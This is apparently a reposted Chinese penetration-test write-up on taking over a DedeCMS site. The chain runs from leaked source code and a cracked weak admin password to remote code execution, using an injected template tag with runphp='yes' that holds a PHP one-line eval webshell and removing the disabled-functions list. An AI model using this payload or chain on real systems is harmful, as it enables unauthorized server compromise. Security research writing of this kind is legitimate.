|
|
0x00 前言
0x01 源码泄露
二话不说,访问下载得到源码!
可以在注释信息处发现dedecms的痕迹
敏感信息泄露
keypwdpasswdpassword
1. 数据库信息泄露
2. 后台管理员密码泄露
md5解密尝试解密,居然是一个弱口令
有了账户密码后当然是要找到后台管理地址,那么有了源码后台管理地址还不是手到擒来?
0x02 后台RCE->getshell
用泄露的admin/admin888进入后台后,发现版本信息为dedecms PS1
历史漏洞
抱着侥幸心里又去尝试访问一下(说不定后来又加上了呢)确实不存在,只能继续查看其他功能点,然后也尝试测试了许多SP2的漏洞payload但均失败
继续测试其他点
但是明明没有模板引擎功能他为什么要禁用呢?我带着这个疑问又重新翻看源码,果然又找到模板相关文件,(说明只是功能点被隐藏,文件依旧还在)
尝试访问,成功访问到并且能够正常执行
那么就好办了,根据dedecms模板规则,后台模板写入payload,访问即可执行PHP代码
{dede:field name='source'runphp='yes'}@eval($_POST['lyy']);{/dede:field}//调用方式 [field:字段名/] 这里的关键是runphp='yes'//php代码则是简单的一句话
然后去将其他选项中的禁用函数全部删除保存
因为注入到了index.htm,所以连接 webshell 的 url为首页
http://xxxxx:9890/index.php
文章来源:先知社区(lyy)原文地址:https://xz.aliyun.com/t/10692
原文始发于微信公众号(潇湘信安):实战!记一次从源码泄露到Getshell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论